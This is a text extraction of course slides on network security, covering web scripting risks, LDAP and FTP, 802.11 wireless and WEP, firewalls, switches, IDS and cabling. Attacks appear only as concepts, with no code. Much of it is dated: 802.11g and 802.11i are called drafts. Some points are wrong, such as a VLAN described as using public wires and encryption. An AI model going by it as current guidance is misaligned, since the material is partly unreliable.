o Common Gateway Interface (CGI)o Simple Mail Transfer Protocol (SMTP) relay
8/3/2019 All Network Security
115/336
JavaScript Scripting language developed by Netscape to
enable Web authors to design interactive sites Code is typically embedded into an HTML
document and placed between the and tags
Programs can perform tasks outside userscontrol
JavaScript Security Loopholes Monitoring Web browsing Reading password and other system files Reading browsers preferences
8/3/2019 All Network Security
116/336
ActiveX
Loosely defined set of technologies developedby Microsofto Outgrowth of OLE (Object Linking and
Embedding) and COM (Component Object Model)
Provides tools for linking desktop applicationsto WWW content
Utilizes embedded Visual Basic code that cancompromise integrity, availability,andconfidentiality of a target system
Buffer Temporary storage area, usually in RAM Acts as a holding area, enabling the CPU to
manipulate data before transferring it to a device
8/3/2019 All Network Security
117/336
Buffer Overflow Attacks
Triggered by sending large amounts of datathat exceeds capacity of receiving applicationwithin a given field
Take advantage of poor applicationprogramming that does not check size of inputfield
Not easy to coordinate; prerequisites:o Place necessary code into programs address
space
o Direct application to read and execute embeddedcode through effective manipulation of registersand memory of system
Cookies Messages given to Web browsers by Web
serverso Browser stores message in a text fileo Message is sent back to server each time browser
requests a page from server Verify a users session Designed to enhance browsing experience
8/3/2019 All Network Security
118/336
Vulnerabilities of Cookies
Contain tools that are easily exploited toprovide information about users withoutconsento Attacker convinces user to follow malicious
hyperlink to targeted server to obtain the cookiethrough error handling process on the server
o User must be logged on during time of attack
To guard against EHE attackso Do not return unescaped data back to usero Do not echo 404 file requests back to user
Java Applets Internet applications (written in Java
programming language) that can operate onmost client hardware and software platforms
Stored on Web servers from where they canbe downloaded onto clients when firstaccessed
With subsequent server access, the applet is
already cached on the client and can beexecuted with no download delay
8/3/2019 All Network Security
119/336
Signed Applets Technique of adding a digital signature to an
applet to prove that it came unaltered from aparticular trusted source
Can be given more privileges than ordinaryapplets
Unsigned applets are subject to sandboxrestrictions
Unsigned Applets
8/3/2019 All Network Security
120/336
Sandbox Model Prevent the applet from:
o Performing required operations on local systemresources
o Connecting to any Web site except the site fromwhich the applet was loaded
o Accessing clients local printero Accessing clients system clipboard and properties
Signed Applets
8/3/2019 All Network Security
121/336
Reasons for UsingCode Signing Features
To release the application from sandboxrestrictions imposed on unsigned code
To provide confirmation regarding source of theapplications code
Common Gateway Interface (CGI) Interface specification that allows
communication between client programs andWeb servers that understand HTTP
Uses TCP/IP Can be written in any programming language Parts of a CGI script
o Executable program on the server (the script itself)o HTML page that feeds input to the executable
8/3/2019 All Network Security
122/336
Typical Form Submission
CGI Interactive nature leads to security loopholes
o Allowing input from other systems to a programthat runs on a local server exposes the system topotential security hazards
8/3/2019 All Network Security
123/336
Precautions to Take When RunningScripts on a Server
Deploy IDS, access list filtering, andscreening on the border of the network
Design and code applications to check sizeand content of input received from clients
Create different user groups with differentpermissions; restrict access to hierarchical filesystem based on those groups
Validate security of a prewritten script beforedeploying it in your production environment
Simple Mail Transfer Protocol(SMTP)
Standard Internet protocol for globale-mail communications
Transaction takes place between two SMTPservers
Designed as a simple protocolo Easy to understand and troubleshooto Easily exploited by malicious users
8/3/2019 All Network Security
124/336
Vulnerabilities of SMTP Relay Spam via SMTP relay can lead to:
o Loss of bandwidtho Hijacked mail servers that may no longer be able
to serve their legitimate purpose Mail servers of innocent organizations can be
subject to blacklisting
Chapter Summary Protocols commonly implemented for secure
message transmissionso Secure Socket Layero Transport Layer Security
Data encryption across the Internet throughSecure Hyper Text Transfer Protocol in relationto SSL/TSL
continued
8/3/2019 All Network Security
125/336
Chapter Summary Instant Messaging
o Common useso Vulnerabilities
Well-known vulnerabilities associated with webdevelopment tools
8/3/2019 All Network Security
126/336
Chapter 7
Directory and File Transfer Services
Learning Objectives Explain benefits offered by centralized
enterprise directory services such as LDAPover traditional authentication systems
Identify major vulnerabilities of the FTPmethod of exchanging data
Describe S/FTP, the major alternative to usingFTP, in order to better secure your network
infrastructure Illustrate the threat posed to your network byunmonitored file shares
8/3/2019 All Network Security
127/336
Directory Services Network services that uniquely identify users and
can be used to authenticate and authorize themto use network resources
Allow users to look up username or resourceinformation, just as DNS does
Lightweight Directory Access Protocol(LDAP)
Accesses directory data based on ISOs X.500standard, but includes TCP/IP support andsimplified client design
Exchanges directory information with clients (isnota database that stores the information)
Allows users to search using a broad set ofcriteria (name, type of service, location)
continued
8/3/2019 All Network Security
128/336
LDAP Provides additional features including
authentication and authorizationo Each person uses only one username and
password regardless of client software and OS Key feature and benefit
o Versatile directory system that is standards basedand platform independent
Major LDAP Products
8/3/2019 All Network Security
129/336
Common Applications of LDAP Single sign-on (SSO) User administration Public key infrastructure (PKI)
LDAP Operations
8/3/2019 All Network Security
130/336
LDAP Framework Directory Information Tree (DIT)
o Data structure that actually contains directoryinformation about network users and services
o Hierarchical structure
Directory Information Tree
8/3/2019 All Network Security
131/336
LDAP Framework
DN exampleo cn=Jonathan Q
Publico ou=Information
Security Departmento o=XYZ Corp.o c=United States
LDAP Security Benefits Authentication
o Ensures users identitieso Three levels
No authentication Simple authentication Simple Authentication and Security Layer (SASL)
Authorizationo Determines network resources the user may
accesso Determined by access control lists (ACLs)
Encryptiono Utilizes other protocols through (SASL)
8/3/2019 All Network Security
132/336
LDAP Security Vulnerabilities Denial of service Man in the middle Attacks against data confidentiality
File Transfer Services Ability to share programs and data around the
world is an essential aspect of the Internet Critical to todays networked organizations
8/3/2019 All Network Security
133/336
File Transfer Protocol (FTP) Commonly used but very insecure Two standard data transmission methods
active FTP and passive FTPo In both, client initiates a TCP session using
destination port 21 (command connection)o Differences are in the data connection that is set
up when user wants to transfer data between twomachines
Setup of FTP Control Connection
8/3/2019 All Network Security
134/336
Active FTP FTPs default connection FTP server creates data connection by opening a
TCP session using source port of 20 anddestination port greater than 1023 (contrary toTCPs normal operation)
Setup of theActive FTP Data Connection
8/3/2019 All Network Security
135/336
Passive FTP Not supported by all FTP implementations Client initiates data connection to the server with
a source and destination port that are bothrandom high ports
Setup of thePassive FTP Data Connection
8/3/2019 All Network Security
136/336
FTP Security Issues Bounce attack Clear text authentication and data transmission Glob vulnerability Software exploits and buffer overflow
vulnerabilities Anonymous FTP and blind FTP access
FTP Countermeasures Do not allow anonymous access unless a clear
business requirement exists Employ a state-of-the-art firewall Ensure that server has latest security patches
and has been properly configured to limit useraccess
Encrypt data before placing it on FTP server
continued
8/3/2019 All Network Security
137/336
FTP Countermeasures Encrypt FTP data flow using a VPN connection Switch to a secure alternative
Secure File Transfers Secure File Transfer Protocol (S/FTP)
o Replacement for FTP that uses SSH version 2 asa secure framework for encrypting data transfers
8/3/2019 All Network Security
138/336
Benefits of S/FTP over FTP
Offers strong authentication using a variety ofmethods including X.509 certificates
Encrypts authentication, commands, and alldata transferred between client and serverusing secure encryption algorithms
Easy to configure a firewall to permit S/FTPcommunications (uses a single, well-behavedTCP connection)
Requires no negotiation to open a second
connection
SecureFTP Implementation Programs
8/3/2019 All Network Security
139/336
File Sharing Originally intended to share files on a LAN Easy to set up Uses Windows graphical interface Can be configured as peer-to-peer or as
client/server shares
8/3/2019 All Network Security
140/336
File Sharing Risks Confidentiality of data Some viruses spread via network shares Other types of critical information beside user
documentation could become compromised iffiles shares are misconfigured
Protecting Your File Shares Define and communicate a policy Conduct audits of file shares using commercial
scanning and audit tools
8/3/2019 All Network Security
141/336
Chapter Summary Key resources used to support mission-critical
business applicationso Directory services
LDAP
o File transfer mechanisms FTP S/FTP
8/3/2019 All Network Security
142/336
Chapter 8
Wireless and Instant Messaging
Learning Objectives Understand security issues related to wireless
data transfer Understand the 802.11x standards Understand Wireless Application Protocol (WAP)
and how it works Understand Wireless Transport Layer Security
(WTLS) protocol and how it works
continued
8/3/2019 All Network Security
143/336
Learning Objectives Understand Wired Equivalent Privacy (WEP) and
how it works Conduct a wireless site survey Understand instant messaging
802.11 IEEE group responsible for defining interface
between wireless clients and their networkaccess points in wireless LANs
First standard finalized in 1997 defined threetypes of transmission at Physical layero Diffused infrared - based on infrared transmissionso Direct sequence spread spectrum (DSSS) - radio-
basedo Frequency hopping spread spectrum (FHSS) -
radio-based
continued
8/3/2019 All Network Security
144/336
802.11 Established WEP as optional security protocol Specified use of 2.4 GHz industrial, scientific, and
medical (ISM) radio band Mandated 1 Mbps data transfer rate and optional
2 Mbps data transfer rate Most prominent working groups: 802.11b,
802.11a, 802.11i, and 802.11g
802.11a High-Speed Physical Layer in the 5 GHz Band Sets specifications for wireless data transmission
of up to 54 Mbps in the5 GHz band
Uses an orthogonal frequency divisionmultiplexing encoding scheme rather than FHSSor DSSS
Approved in 1999
8/3/2019 All Network Security
145/336
802.11b
Higher-Speed Layer Extension in the 2.4GHz Band
Establishes specifications for datatransmission that provides 11 Mbpstransmission (with fallback to 5.5, 2, and 1Mbps) at 2.4 GHz band
Sometimes referred to as Wi-Fi whenassociated with WECA certified devices
Uses only DSSS
Approved in 1999
802.11c Worked to establish MAC bridging functionality
for 802.11 to operate in other countries Folded into 802.1D standard for MAC bridging
8/3/2019 All Network Security
146/336
802.11d Responsible for determining requirements
necessary for 802.11 to operate in othercountries
Continuing
802.11e Responsible for creating a standard that will add
multimedia and quality of service (QoS)capabilities to wireless MAC layer and thereforeguarantee specified data transmission rates anderror percentages
Proposal in draft form
8/3/2019 All Network Security
147/336
802.11f Responsible for creating a standard that will allow
for better roaming between multivendor accesspoints and distribution systems
Ongoing
802.11g Responsible for providing raw data throughput
over wireless networks at a throughput rate of 22Mbps or more
Draft created in January 2002; final approvalexpected in late 2002 or early 2003
8/3/2019 All Network Security
148/336
802.11h
Responsible for providing a way to allow forEuropean implementation requests regardingthe 5 GHz band
Requirementso Limits PC card from emitting more radio signal
than neededo Allows devices to listen to radio wave activity
before picking a channel on which to broadcast
Ongoing; not yet approved
802.11i Responsible for fixing security flaws in WEP and
802.1x Hopes to eliminate WEP altogether and replace it
with Temporal Key Integrity Protocol (TKIP),which would require replacement of keys within acertain amount of time
Ongoing; not yet approved
8/3/2019 All Network Security
149/336
802.11j Worked to create a global standard in the
5 GHz band by making high-performance LAN(HiperLAN) and 802.11a interoperable
Disbanded after efforts in this area were mostlysuccessful
8/3/2019 All Network Security
150/336
Wireless Application Protocol(WAP) Open, global specification created by the WAP
Forum Designed to deliver information and services to
users of handheld digital devices Compatible with most wireless networks Can be built on any operating system
WAP-Enabled Devices
8/3/2019 All Network Security
151/336
WAP-Enabled Devices
How WAP 1x Works WAP 1.x Stack
o Set of protocols created by the WAP Forum thatalters the OSI model
o Five layers lie within the top four (of seven) layersof the OSI model
o Leaner than the OSI model Each WAP protocol makes data transactions as
compressed as possible and allows for more droppedpackets than OSI model
8/3/2019 All Network Security
152/336
WAP 1.x Stack Compared toOSI/Web Stack
Differences Between Wireless andWired Data Transfer
WAP 1.x stack protocols require that datacommunications between clients (wirelessdevices) and servers pass through a WAPgateway
Network architectural structures
8/3/2019 All Network Security
153/336
WAP versus Wired Network
The WAP 2.0 Stack Eliminates use of WTLS; relies on a lighter
version of TLS the same protocol used onthe common Internet stack which allowsend-to-end security and avoids any WAPgaps
Replaces all other layers of WAP 1.x bystandard Internet layers
Still supports the WAP 1.x stack in order tofacilitate legacy devices and systems
8/3/2019 All Network Security
154/336
Additional WAP 2.0 Features WAP Push User agent profile Wireless Telephony Application Extended Functionality Interface (EFI) Multimedia Messaging Service (MMS)
8/3/2019 All Network Security
155/336
Wireless Transport Layer Security(WTLS) Protocol
Provides authentication, data encryption, andprivacy for WAP 1.x users
Three classes of authenticationo Class 1
Anonymous; does not allow either the client or thegateway to authenticate each other
o Class 2 Only allows the client to authenticate the gateway
o Class 3 Allows both the client and the gateway to authenticate
each other
WTLS Protocol:Steps of Class 2 Authentication
1.WAP device sends request for authentication2.Gateway responds, then sends a copy of its
certificate which contains gateways publickey to the WAP device
3.WAP device receives the certificate and publickey and generates a unique random value
4.WAP gateway receives encrypted value and
uses its own private key to decrypt it
8/3/2019 All Network Security
156/336
WTLS Security Concerns Security threats posed by WAP gap Unsafe use of service set identifiers (SSIDs)
Wired Equivalent Privacy (WEP) Optional security protocol for wireless local
area networks defined in the 802.11bstandard
Designed to provide same level of security asa wired LAN
Not considered adequate security without alsoimplementing a separate authentication
process and providing for external keymanagement
8/3/2019 All Network Security
157/336
Wireless LAN (WLAN) Connects clients to network resources using
radio signals to pass data through the ether Employs wireless access points (AP)
o Connected to the wired LANo Act as radio broadcast stations that transmit data
to clients equipped with wireless network interfacecards (NICs)
How a WLAN Works
8/3/2019 All Network Security
158/336
APs
NICs
8/3/2019 All Network Security
159/336
How WEP Works Uses a symmetric key (shared key) to
authenticate wireless devices(not wirelessdevice users) and to guarantee integrity of databy encrypting transmissions
Each of the APs and clients need to share thesame key
Client sends a request to the AP asking forpermission to access the wired network
continued
How WEP Works If WEP has not been enabled (default), the AP
allows the request to pass If WEP hasbeen enabled, client begins a
challenge-and-response authentication process
8/3/2019 All Network Security
160/336
WEPs Weaknesses Problems related to the initialization vector (IV)
that it uses to encrypt data and ensure itsintegrityo Can be picked up by hackerso Is reused on a regular basis
Problems with how it handles keys
Other WLAN Security Loopholes War driving Unauthorized users can attach themselves to
WLANs and use their resources, set up theirown access points and jam the network
WEP authenticates clients, not users Wireless network administrators and users
must be educated about inherent insecurity of
wireless systems and the need for care
8/3/2019 All Network Security
161/336
Conducting a Wireless SiteSurvey1.Conduct a needs assessment of network users2.Obtain a copy of the sites blueprint3.Do a walk-through of the site4.Identify possible access point locations5.Verify access point locations6.Document findings
Instant Messaging (IM) AOL Instant Messenger (AIM) MSN Messenger Yahoo! Messenger ICQ Internet Relay Chat (IRC)
8/3/2019 All Network Security
162/336
Definition of IM Uses a real-time communication model Allows users to keep track of online status and
availability of other users who are also using IMapplications
Can be used on both wired and wireless devices Easy and fast
continued
Definition of IM Operates in two models:
o Peer-to-peer model May cause client to expose sensitive information
o Peer-to-network model Risk of network outage and DoS attacks making IM
communication unavailable
8/3/2019 All Network Security
163/336
Problems Facing IM Lack of default encryption enables packet sniffing Social engineering overcomes even encryption
Technical Issues Surrounding IM Files transfers Application sharing
8/3/2019 All Network Security
164/336
Legal Issues Surrounding IM Possible threat of litigation or criminal indictment
should the wrong message be sent or overheardby the wrong person
Currently immune to most corporate efforts tocontrol it
Must be monitored in real time
Blocking IM Install a firewall to block ports that IM products
use; IM will be unavailable to all employees Limited blocking not currently possible
8/3/2019 All Network Security
165/336
Cellular Phone Simple MessagingService (SMS)
Messages are typed and sent immediately Problems
o Tracking inappropriate messageso Risk of having messages sniffed
Chapter Summary Efforts of IEEE, specifically 802.11x standards, to
standardize wireless security Security issues related to dominant wireless
protocolso WAP
Connects mobile telephones, PDAs, pocket computers,and other mobile devices to the Internet
o WEP Used in WLANs
continued
8/3/2019 All Network Security
166/336
Chapter Summary WTLS protocol Conducting a site survey in advance of building a
WLAN Security threats related to using (IM)
8/3/2019 All Network Security
167/336
Chapter 9
Devices
Learning Objectives Understand the purpose of a network firewall and
the kinds of firewall technology available on themarket
Understand the role of routers, switches, andother networking hardware in security
Determine when VPN or RAS technology worksto provide a secure network connection
8/3/2019 All Network Security
168/336
Firewalls Hardware or software device that provides a
means of securing a computer or network fromunwanted intrusiono Dedicated physical device that protects network
from intrusiono Software feature added to a router, switch, or
other device that prevents traffic to or from part ofa network
Management Cycle forFirewall Protection
1.Draft a written security policy2.Design the firewall to implement the policy3.Implement the design by installing selected
hardware and software4.Test the firewall5.Review new threats, requirements for
additional security, and updates to systems
and software; repeat process from first step
8/3/2019 All Network Security
169/336
Drafting a Security Policy What am I protecting? From whom? What services does my company need to access
over the network? Who gets access to what resources? Who administers the network?
Available Targets andWho Is Aiming at Them
Common areas of attacko Web serverso Mail serverso FTP serverso Databases
Intruderso Sport hackerso Malicious hackers
8/3/2019 All Network Security
170/336
Who Gets Access to WhichResources?
List employees or groups of employees alongwith files and file servers and databases anddatabase servers they need to access
List which employees need remote access to thenetwork
8/3/2019 All Network Security
171/336
Who Administers the Network? Determine individual(s) and scope of individual
management control
Designing the Firewallto Implement the Policy
Select appropriate technology to deploy thefirewall
8/3/2019 All Network Security
172/336
What Do Firewalls ProtectAgainst? Denial of service (DoS) Ping of death Teardrop or Raindrop attacks SYN flood LAND attack Brute force or smurf attacks IP spoofing
How Do Firewalls Work? Network address translation (NAT) Basic packet filtering Stateful packet inspection (SPI) Application gateways Access control lists (ACL)
8/3/2019 All Network Security
173/336
Network Address Translation(NAT)
Only technique used by basic firewalls Enables a LAN to use one set of IP addresses
for internal traffic and a second set forexternal traffic
Each active connection requires a uniqueexternal address for duration ofcommunication
Port address translation (PAT)o Derivative of NATo Supports thousands of simultaneous connections
on a single public IP address
Basic Packet Filtering Firewall system examines each packet that
enters it and allows through only thosepackets that match a predefined set of rules
Can be configured to screen informationbased on many data fields:o Protocol typeo IP addresso TCP/UDP porto Source routing information
8/3/2019 All Network Security
174/336
Stateful Packet Inspection (SPI)
Controls access to network by analyzingincoming/outgoing packets and letting thempass or not based on IP addresses of sourceand destinationo Examines a packet based on information in its
header
Enhances security by allowing the filter todistinguish on which side of firewall aconnection was initiated; essential to blocking
IP spoofing attaches
Access Control Lists (ACL) Rules built according to organizational policy that
defines who can access portions of the network
8/3/2019 All Network Security
175/336
Routers Network management device that sits between
network segments and routes traffic from onenetwork to another
Allows networks to communicate with oneanother
Allows Internet to function Act as digital traffic cop (with addition of packet
filtering)
How a Router Moves Information Examines electronic envelope surrounding a
packet; compares address to list of addressescontained in routers lookup tables
Determines which router to send the packet tonext, based on changing network conditions
8/3/2019 All Network Security
176/336
How a Router Moves Information
Beyond the Firewall Demilitarized zone (DMZ) Bastion hosts (potentially)
8/3/2019 All Network Security
177/336
Demilitarized Zone
Area set aside for servers that are publiclyaccessible or have lower securityrequirements
Sits between the Internet and internalnetworks line of defenseo Stateful device fully protects other internal
systemso Packet filter allows external traffic only to services
provided by DMZ servers
Allows a company to host its own Internetservices without sacrificing unauthorizedaccess to its private network
8/3/2019 All Network Security
178/336
Bastion Hosts
Computers that reside in a DMZ and that hostWeb, mail, DNS, and/or FTP services
Gateway between an inside network and anoutside network
Defends against attacks aimed at the insidenetwork; used as a security measure
Unnecessary programs, services, andprotocols are removed; unnecessary networkports are disabled
Do not share authentication services withtrusted hosts within the network
Application Gateways Also known as proxy servers Monitor specific applications (FTP, HTTP, Telnet) Allow packets accessing those services to go to
only those computers that are allowed Good backup to packet filtering
8/3/2019 All Network Security
179/336
Application Gateways Security advantages
o Information hidingo Robust authentication and loggingo Simpler filtering rules
Disadvantageo Two steps are required to connect inbound or
outbound traffic; can increase processor overhead
OSI Reference Model Architecture that classifies most network
functions Seven layers
o Applicationo Presentationo Sessiono Transporto Network
o Data-Linko Physical
8/3/2019 All Network Security
180/336
The OSI Stack Layers 4 and 5
o Where TCP and UDP ports that controlcommunication sessions operate
Layer 3o Routes IP packets
Layer 2o Delivers data frames across LANs
8/3/2019 All Network Security
181/336
Limitations ofPacket-Filtering Routers
ACL can become long, complicated, and difficultto manage and comprehend
Throughput decreases as number of rules beingprocessed increases
Unable to determine specific content or data ofpackets at layers 3 through 5
Switches Provide same function as bridges (divide
collision domains), but employ application-specific integrated circuits (ASICs) that areoptimized for the task
Reduce collision domain to two nodes (switchand host)
Main benefit over hubso Separation of collision domains limits the
possibility of sniffing
8/3/2019 All Network Security
182/336
Switches
Switch Security ACLs Virtual Local Area Networks (VLANs)
8/3/2019 All Network Security
183/336
Virtual Local Area Network
Uses public wires to connect nodes Broadcast domain within a switched network Uses encryption and other security
mechanisms to ensure thato Only authorized users can access the networko Data cannot be intercepted
Clusters users in smaller groupso Increases security from hackerso Reduces possibility of broadcast storm
Security Problems with Switches Common ways of switch hijacking
o Try default passwords which may not have beenchanged
o Sniff network to get administrator password viaSNMP or Telnet
8/3/2019 All Network Security
184/336
Securing a Switch Isolate all management interfaces Manage switch by physical connection to a serial
port or through secure shell (SSH) or otherencrypted method
Use separate switches or hubs for DMZs tophysically isolate them from the network andprevent VLAN jumping
continued
Securing a Switch Put switch behind dedicated firewall device Maintain the switch; install latest version of
software and security patches Read product documentation Set strong passwords
8/3/2019 All Network Security
185/336
Example of a Compromised VLAN
Wireless Almost anyone can eavesdrop on a network
communication Encryption is the only secure method of
communicating with wireless technology
8/3/2019 All Network Security
186/336
Modems
DSL versus Cable Modem
Security DSL
o Direct connection between computer/network andthe Internet
Cable modemo Connected to a shared segment; party lineo Most have basic firewall capabilities to prevent
files from being viewed or downloadedo Most implement the Data Over Cable Service
Interface Specification (DOCSIS) forauthentication and packet filtering
8/3/2019 All Network Security
187/336
Dynamic versus Static IP Addressing
Static IP addresseso Provide a fixed target for potential hackers
Dynamic IP addresseso Provide enhanced securityo By changing IP addresses of client machines,
DHCP server makes them moving targets forpotential hackers
o Assigned by the Dynamic Host ConfigurationProtocol (DHCP)
Remote Access Service (RAS) Provides a mechanism for one computer to
securely dial in to another computer Treats modem as an extension of the network Includes encryption and logging Accepts incoming calls Should be placed in the DMZ
8/3/2019 All Network Security
188/336
Security Problems with RAS Behind physical firewall; potential for network to
be compromised Most RAS systems offer encryption and callback
as features to enhance security
Telecom/Private Branch Exchange(PBX)
PBXo Private phone system that offers features such as
voicemail, call forwarding, and conference callingo Failure to secure a PBX can result in toll fraud,
theft of information, denial of service, andenhanced susceptibility to legal liability
8/3/2019 All Network Security
189/336
IP-Based PBX
PBX Security Concerns Remote PBX management Hoteling or job sharing
o Many move codes are standardized and postedon the Internet
8/3/2019 All Network Security
190/336
Virtual Private Networks
Provide secure communication pathway ortunnel through public networks (eg, Internet)
Lowest levels of TCP/IP are implementedusing existing TCP/IP connection
Encrypts either underlying data in a packet orthe entire packet itself before wrapping it inanother IP packet for delivery
Further enhances security by implementingInternet Protocol Security (IPSec)
8/3/2019 All Network Security
191/336
Internet Protocol Security (IPSec) Allows encryption of either just the data in a
packet (transport mode) or the packet as a whole(tunnel mode)
Enables a VPN to eliminate packet sniffing andidentity spoofing
Requirement of Internet Protocol version 6 (IPv6)specification
Intrusion Detection Systems (IDS) Monitor networks and report on unauthorized
attempts to access any part of the system Available from many vendors Forms
o Software (computer-based IDS)o Dedicated hardware devices (network-based IDS)
Types of detectiono Anomaly-based detectiono Signature-based detection
8/3/2019 All Network Security
192/336
Computer-based IDS
Software applications (agents) are installedon each protected computero Make use of disk space, RAM, and CPU time to
analyze OS, applications, system audit trailso Compare these to a list of specific ruleso Report discrepancies
Can be self-contained or remotely managed Easy to upgrade software, but do not scale
well
Network-based IDS Monitors activity on a specific network segment Dedicated platforms with two components
o Sensor Passively analyzes network traffic
o Management system Displays alarm information from the sensor
8/3/2019 All Network Security
193/336
Anomaly-based Detection Builds statistical profiles of user activity and
then reacts to any activity that falls outsidethese profiles
Often leads to large number of false positiveso Users do not access computers/network in static,
predictable wayso Cost of building a sensor that could hold enough
memory to contain the entire profile and time to
process the profiles is prohibitively large
8/3/2019 All Network Security
194/336
Signature-based Detection
Similar to antivirus program in its method ofdetecting potential attacks
Vendors produce a list of signatures used bythe IDS to compare against activity on thenetwork or host
When a match is found, the IDS take someaction (eg, logging the event)
Can produce false positives; normal networkactivity may be construed as malicious
Network Monitoring and Diagnostics
Essential steps in ensuring safety and health of anetwork (along with IDS)
Can be either stand-alone or part of a network-monitoring platformo HPs OpenViewo IBMs Netview/AIXo Fidelias NetVigilo Aprismas Spectrum
8/3/2019 All Network Security
195/336
Ensuring Workstation andServer Security
Remove unnecessary protocols such as NetBIOSor IPX
Remove unnecessary user accounts Remove unnecessary shares Rename the administrator account Use strong passwords
Personal Firewall Software Packages
Offer application-level blocking, packetfiltering, and can put your computer intostealth mode by turning off most if not all ports
Many products available, including:o Norton Firewallo ZoneAlarmo Black Ice Defendero Tiny Softwares Personal Firewall
8/3/2019 All Network Security
196/336
Firewall Product Example
Antivirus Software Packages Necessary even on a secure network Many vendors, including:
o McAffeeo Nortono Computer Associateso Network Associates
8/3/2019 All Network Security
197/336
Mobile Devices
Can open securityholes for anycomputer with whichthese devicescommunicate
Chapter Summary Virtual isolation of a computer or network by
implementing a firewall through software andhardware techniques:o Routerso Switcheso Modemso Various software packages designed to run on
servers, workstations, and PDAs
continued
8/3/2019 All Network Security
198/336
Chapter Summary Virtual private networks (VPNs) Private branch exchanges (PBX) Remote Access Services (RAS)
8/3/2019 All Network Security
199/336
Chapter 10
Media and Medium
Learning Objectives Identify and discuss the various types of
transmission media Explain how to physically protect transmission
media adequately Identify and discuss the various types of storage
media Know how to lessen the risk of catastrophic loss
of information
continued
8/3/2019 All Network Security
200/336
Learning Objectives Understand the various ways to encrypt data Properly maintain or destroy stored data
Transmission Media Coaxial cable Twisted pair copper cable
o Shieldedo Unshielded
Fiber-optic cable Wireless connections
8/3/2019 All Network Security
201/336
Coaxial Cable Hollow outer cylinder surrounds a single inner
wire conductor
Coaxial Cable More expensive than traditional telephone
wiring Less prone to interference Typically carries larger amounts of data Easily spliced; allows unauthorized users
access to the network Two types (not interchangeable)
o 50-ohmo 75-ohm
8/3/2019 All Network Security
202/336
50-Ohm Coaxial Cable Uses unmodulated signal over a single channel Two standards
o 10Base2 (ThinNet)o 10Base5 (ThickNet)
50-Ohm Coaxial Cable Advantages
o Simple to implement and widely availableo Low cost alternative that provides relatively high
rates of data transmission Disadvantages
o Can only carry data and voiceo Limited in distance it can transmit signals
8/3/2019 All Network Security
203/336
10Base2 (ThinNet) Uses a thin coaxial cable in an Ethernet
environment Capable of covering up to 180 meters Allows daisy chaining Not highly susceptible to noise interference Transmits at 10 Mbps Can support up to 30 nodes per segment
10Base5 (ThickNet) Primarily used as a backbone in an office LAN
environment Often connects wiring closets Can transmit data at speeds up to 10 Mbps Covers distances up to 500 meters Can accommodate up to 100 nodes per segment Rigid and difficult to work with
8/3/2019 All Network Security
204/336
75-ohm Coaxial Cable For analog signaling and high-speed digital
signaling
75-ohm Coaxial Cable Advantages
o Allows for data, voice, and video capabilitieso Can cover greater distances and offers more
bandwidth Disadvantages
o Requires hardware to connect via modemso More difficult to maintain
8/3/2019 All Network Security
205/336
Twisted Pair Copper Cable
Individual copper wires are twisted together toprevent cross talk between pairs and toreduce effects of EMI and RFI
Inexpensive alternative to coaxial cable, butcannot support the same distances
Long been used by telephone companies Types
o Unshielded twisted pair (UTP)o Shielded twisted pair (STP)
Unshielded Twisted Pair (UTP) Most common medium for both voice and data Currently supports up to 1 Gbps protocols
8/3/2019 All Network Security
206/336
Shielded Twisted Pair (STP) Extra foil shield wrapped between copper pairs
provides additional insulation from EMI Used extensively in LAN wiring
Shielded Twisted Pair (STP)
8/3/2019 All Network Security
207/336
Twisted Pair Categories Category 3 (CAT 3) Category 5 (CAT 5) Category 6 (CAT 6)
Twisted Pair CAT 3 For voice and data transmission
8/3/2019 All Network Security
208/336